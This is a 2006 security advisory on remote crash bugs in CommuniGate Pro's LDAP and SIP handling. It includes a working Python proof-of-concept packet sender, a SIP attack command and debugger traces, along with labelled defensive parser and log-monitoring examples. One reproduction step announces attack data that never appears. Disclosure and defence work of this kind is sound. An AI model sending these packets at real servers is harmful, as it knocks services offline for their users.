[UNIX] CommuniGate Pro Server Multiple DoS (LDAP, SIP)

Subject: [UNIX] CommuniGate Pro Server Multiple DoS (LDAP, SIP)
Date: 7 Feb 2006 16:25:34 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com

  CommuniGate Pro Server Multiple DoS (LDAP, SIP)
------------------------------------------------------------------------


SUMMARY

"CommuniGate Pro is the most scalable and modern Internet Communications 
application server on the market today." 
<http://www.stalker.com/content/solutions.htm>

Improper handling of crafted LDAP and SIP packets allows attackers to 
remotely crash CommuniGate Pro.

DETAILS

Vulnerable Systems:
 * CommuniGate Pro Server version 5.0.7

Immune Systems:
 * CommuniGate Pro Server version 5.0.8

LDAP DoS:
By crafting a special LDAP packet, attackers can crash the server 
remotely.

Proof of Concept:
#!/usr/bin/env python
# Use this code at your own risk.
# It may crash your server!
# Author: Evgeny Legerov

import sys
import socket

HELP="""
CommuniGate Pro 5.0.6 vulnerability.
Found with ProtoVer LDAP testsuite v1.1

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1389495376 (LWP 20235)]
0xada99bbc in memcpy () from /lib/libc.so.6
(gdb) backtrace
#0  0xada99bbc in memcpy () from /lib/libc.so.6
#1  0x083924b8 in STCopyCString ()
#2  0x08349d5b in BERPackedData::makeCString ()
#3  0x081ae71a in VLDAPInput::processBINDrequest ()
#4  0x081af747 in VLDAPInput::processInput ()
#5  0x082c9373 in VStream::worker ()
#6  0x082ca1e9 in VStream::starter ()
#7  0x08399e7d in STThreadStarter ()
#8  0xadb8bb80 in start_thread () from /lib/libpthread.so.0
#9  0xadaf8dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0xada99bbc <memcpy+28>: repz movsl %ds:(%esi),%es:(%edi)
(gdb) info regi esi edi ecx
esi            0x8688961        141068641
edi            0x86c6fff        141324287
ecx            0x3fff7eae       1073708718
"""

print HELP

host="localhost"
port=389

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))

s  = "\x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80"
s += "\x84\xff\xff\xff\xff"

sock.sendall(s)
sock.close()
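
The proof of concept ends its BIND request with an element whose long-form BER length claims 0xffffffff bytes although none follow, and the backtrace shows that length reaching memcpy(). The check a parser needs before copying anything, as an added example that is not code from the advisory or from CommuniGate Pro; MAX_DEPTH, the function names and the well-formed sample message are assumptions made for illustration.

```python
MAX_DEPTH = 16  # assumed nesting limit, not a CommuniGate Pro value

class BERError(ValueError):
    """A TLV header is malformed or overruns its enclosing element."""

def read_tlv(buf, pos, end):
    """Parse the TLV header at pos; return (tag, value_start, value_end)."""
    if end - pos < 2:
        raise BERError("truncated header at offset %d" % pos)
    tag, first, body = buf[pos], buf[pos + 1], pos + 2
    length = first                    # short form: the byte is the length
    if first >= 0x80:                 # long form: next n bytes hold the length
        n = first & 0x7F
        if n == 0 or n > 4 or n > end - body:
            raise BERError("bad length-of-length %d at offset %d" % (n, pos))
        length = int.from_bytes(buf[body:body + n], "big")
        body += n
    # Never trust a declared length beyond the bytes actually present.
    if length > end - body:
        raise BERError("element at offset %d declares %d bytes, %d remain"
                       % (pos, length, end - body))
    return tag, body, body + length

def walk(buf, pos=0, end=None, depth=0):
    """Return [(depth, tag, length), ...] for all elements, or raise BERError."""
    end = len(buf) if end is None else end
    if depth > MAX_DEPTH:
        raise BERError("nesting deeper than %d" % MAX_DEPTH)
    elements = []
    while pos < end:
        tag, vstart, vend = read_tlv(buf, pos, end)
        elements.append((depth, tag, vend - vstart))
        if tag & 0x20:                # constructed: descend into the value
            elements += walk(buf, vstart, vend, depth + 1)
        pos = vend
    return elements

def verdict(buf):
    """Return 'ok', or the reason the message is dropped before dispatch."""
    try:
        walk(buf)
        return "ok"
    except BERError as exc:
        return str(exc)

# The 20 bytes built by the proof of concept on this page.
POC = bytes.fromhex("3012020101600d0201030402444e8084ffffffff")
# Constructed, well-formed anonymous simple bind for contrast.
GOOD = bytes.fromhex("300c020101600702010304008000")
```

Every element is bounded by its parent's end offset, so the oversized length is rejected at the header, before any value bytes are touched.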

LDAP DoS:
By crafting a special LDAP packet, attackers can crash the server remotely.

Example:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1458242640 (LWP 25554)]
0x080fa008 in VDirectoryFile::findParentDN ()
(gdb) backtrace
#0  0x080fa008 in VDirectoryFile::findParentDN ()
#1  0x080fa031 in VDirectoryFile::findParentDN ()
..
#353 0x080fa031 in VDirectoryFile::findParentDN ()
#354 0x080fcc6f in VDirectoryFile::findRecords ()
#355 0x080efc23 in VDirectory::findDirectoryRecords ()
#356 0x081b09b3 in VLDAPInput::processInput ()
#357 0x082cb5a3 in VStream::worker ()
#358 0x082cc419 in VStream::starter ()
#359 0x0839c369 in STThreadStarter ()
#360 0xa9a09b80 in start_thread () from /lib/libpthread.so.0
#361 0xa9976dee in clone () from /lib/libc.so.6

To reproduce the vulnerability, send the following data to LDAP port:
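
The backtrace above shows VDirectoryFile::findParentDN() calling itself more than 350 frames deep before the fault. An added example (not code from the advisory or from CommuniGate Pro) that validates a search base DN and computes its ancestors with a loop, so depth never consumes stack. It assumes the recursion depth follows the number of comma-separated DN components, which the page does not state; the limits, names and sample DNs are constructed for illustration.

```python
MAX_RDNS = 64         # assumed cap on DN components
MAX_DN_BYTES = 1024   # assumed cap on DN size

class DNError(ValueError):
    """The DN is rejected before any directory lookup."""

def split_dn(dn):
    """Split on unescaped commas; a backslash escapes the next character."""
    parts, cur, i = [], "", 0
    while i < len(dn):
        if dn[i] == "\\":
            cur += dn[i:i + 2]
            i += 2
        elif dn[i] == ",":
            parts.append(cur)
            cur = ""
            i += 1
        else:
            cur += dn[i]
            i += 1
    return parts + [cur]

def validate_dn(dn):
    """Return the RDN list for dn, or raise DNError."""
    if len(dn.encode("utf-8")) > MAX_DN_BYTES:
        raise DNError("DN longer than %d bytes" % MAX_DN_BYTES)
    if not dn:
        return []                      # empty DN: the root
    rdns = [part.strip() for part in split_dn(dn)]
    if len(rdns) > MAX_RDNS:
        raise DNError("%d components, limit is %d" % (len(rdns), MAX_RDNS))
    for rdn in rdns:
        attr, sep, _value = rdn.partition("=")
        if not sep or not attr.strip():
            raise DNError("component without attribute type: %r" % rdn)
    return rdns

def parent_dns(dn):
    """Return every ancestor of dn, nearest first, with a loop, not recursion."""
    rdns = validate_dn(dn)
    return [",".join(rdns[i:]) for i in range(1, len(rdns))]

def rejects(dn):
    """Return the rejection reason for dn, or None if it is accepted."""
    try:
        validate_dn(dn)
    except DNError as exc:
        return str(exc)

# Constructed inputs: a 102-component DN and one with an empty component.
DEEP = ",".join(["ou=x"] * 100) + ",dc=example,dc=com"
EMPTY = "ou=people,,dc=example,dc=com"
```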

SIP DoS:
By crafting a special SIP packet, attackers can crash the server remotely.

Example:
StarGate:~# java -jar c07-sip-r2.jar -touri kfinisterre@192.168.0.35 -single 2361

Log file snippet:
Dec  9 16:18:14 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3 started
Dec  9 16:20:35 localhost CommuniGatePro: Exception signal: 11, trying to recover
Dec  9 16:20:35 localhost CommuniGatePro: Exception in <STThread 87394E8 UDPReceiver 5060>
Dec  9 16:21:07 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3 started
Dec  9 16:21:33 localhost CommuniGatePro: Exception signal: 11, trying to recover
Dec  9 16:21:33 localhost CommuniGatePro: Exception in <STThread 8738B60 UDPReceiver 5060>

0x4010e3ac in memmove () from /lib/libc.so.6
(gdb) i r
eax            0xffffffe0       -32
ecx            0x1      1
edx            0xffffffe1       -31
ebx            0x8699758        141137752
esp            0xbabff670       0xbabff670
ebp            0xbabff678       0xbabff678
esi            0x868eeae        141094574
edi            0xffffffe0       -32
eip            0x4010e3ac       0x4010e3ac

(gdb) x/i $pc
0x4010e3ac <memmove+92>:        repz movsb %ds:(%esi),%es:(%edi)

(gdb) bt
#0  0x4010e3ac in memmove () from /lib/libc.so.6
#1  0x0836cdac in SBMutableData::setBytes ()
#2  0x08280964 in VSIPPacket::parseFields ()
#3  0x0827f8da in VSIPPacket::parseData ()
#4  0x0827c8e8 in VSIP::processReadPacket ()
#5  0x0827ce83 in VSIP::processUDPRequest ()
#6  0x081bfeb1 in VUDPListener::receiver ()
#7  0x081bfa71 in VUDPListener::receiverStarter ()
#8  0x0838ad1d in STThreadStarter ()
#9  0x4002af4c in pthread_start_thread () from /lib/libpthread.so.0
#10 0x4002afda in pthread_start_thread_event () from /lib/libpthread.so.0
#11 0x4015f92a in clone () from /lib/libc.so.6
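
The log file snippet above is what this crash looks like to an operator: a signal line, the name and port of the listener thread that faulted, then a restart. An added example (not part of the advisory) that extracts those events from syslog and flags a listener that crashes repeatedly inside a short window. The five-minute window, the threshold of two and the year are assumptions, since syslog timestamps carry no year.

```python
import re
from datetime import datetime, timedelta

# Log lines from the snippet above, with wrapped lines rejoined.
SAMPLE = """\
Dec  9 16:18:14 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3 started
Dec  9 16:20:35 localhost CommuniGatePro: Exception signal: 11, trying to recover
Dec  9 16:20:35 localhost CommuniGatePro: Exception in <STThread 87394E8 UDPReceiver 5060>
Dec  9 16:21:07 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3 started
Dec  9 16:21:33 localhost CommuniGatePro: Exception signal: 11, trying to recover
Dec  9 16:21:33 localhost CommuniGatePro: Exception in <STThread 8738B60 UDPReceiver 5060>
"""

LINE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ CommuniGatePro: (.*)$")
SIGNAL = re.compile(r"Exception signal: (\d+)")
THREAD = re.compile(r"Exception in <STThread \w+ (\w+) (\d+)>")

def crashes(text, year=2005):
    """Return [(time, signal, thread, port)]; the year is an assumed value."""
    events, pending = [], None
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        stamp = "%d %s" % (year, m.group(1))
        when = datetime.strptime(stamp, "%Y %b %d %H:%M:%S")
        sig, thr = SIGNAL.search(m.group(2)), THREAD.search(m.group(2))
        if sig:
            pending = int(sig.group(1))      # signal precedes the thread line
        elif thr:
            events.append((when, pending, thr.group(1), int(thr.group(2))))
            pending = None
    return events

def crash_loops(events, window=timedelta(minutes=5), threshold=2):
    """Return {(thread, port): n} where n crashes fell inside one window."""
    by_listener, alerts = {}, {}
    for when, _sig, thread, port in events:
        by_listener.setdefault((thread, port), []).append(when)
    for key, times in by_listener.items():
        times.sort()
        best = max(sum(1 for t in times[i:] if t - t0 <= window)
                   for i, t0 in enumerate(times))
        if best >= threshold:
            alerts[key] = best
    return alerts
```

Keying on thread name and port rather than the thread address matters here: the address differs between the two crashes, while the listener (UDPReceiver 5060) is the same.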

Vendor Status:
The vendor has issued a new version with fixes: CommuniGate Pro Server 
version 5.0.8


ADDITIONAL INFORMATION

The information has been provided by Evgeny Legerov <research@gleg.net> 
and KF <kf_lists@digitalmunition.com>.
The original article can be found at: http://www.gleg.net/cg_advisory.txt


